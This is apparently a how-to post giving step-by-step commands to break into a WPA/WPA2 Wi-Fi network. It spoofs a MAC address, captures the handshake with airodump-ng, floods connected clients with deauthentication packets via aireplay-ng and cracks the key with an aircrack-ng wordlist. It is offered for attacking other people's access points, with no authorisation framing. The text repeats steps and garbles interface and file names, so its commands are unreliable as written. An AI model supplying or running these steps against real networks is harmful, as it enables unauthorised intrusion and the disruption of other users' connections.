Some requirements
1.We need to boot or install kali linux or back track.
2.Network card is important and it should support packet injection.
Some important features or characteristics
1.MAC Address (Media Access Control Address).
2.WAP(Wireless Access Point.
3.PSK(Pre Shared Key)
4.WPA/WPA2 (Wifi Protected Access/Wifi Protected Access 2)
5.BSSID(Extended Service Set Identification)
There are few steps to be followed
First step(1):
- In backtrack open the terminal and give command 'ifconfig'.
- You will see numbers of lists of all networks adapters in your system like wlanx,wlano etc.
- Turn off your network card using command: ifconfig wlano down (You should change wlano to whatever it said in previous command.)
- Give the command: macchanger-m 00:11:22:33:44:55
- Turn the device on by giving command: ifconfig wlano up
Second step(2)
Second step is all about creating a virtual monitoring interface.
Third step(3)
By monitoring the wireless traffic start the attack
Fourth step(4)
Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.
What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.
Second step is all about creating a virtual monitoring interface.
- Give command :airmon-ng start wlano
- It creates a new monitor interface known as mono
Third step(3)
By monitoring the wireless traffic start the attack
- Give command : airodump-ng mono. It will list down all active AP and their BSSID and other details . Also below the list you will see the list of computer stations connected to any of their APs.
- Note down the BSSID and channel it using (CH in the output) of the AP you want to hit .
- Hit Ctrl+C to end the monitoring .
Fourth step(4)
Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.
What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.
- Give Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilenamemon0
- This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.
Capturing authentication Packets:This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.
- Open new terminal and give command :
aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint. - If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
- Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
Hit ctrl+c and exit it. Time to crack the password.
- You need a password list file which can be downloaded from the internet. Just search for "wordlist" or "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
- Get and extract the word list file to your home folder.
- Run the command :
aircrack-ng -w wordlist.lst -b <AP BSSID> dumpfilename*.cap - Replace the underlined with the the right details.
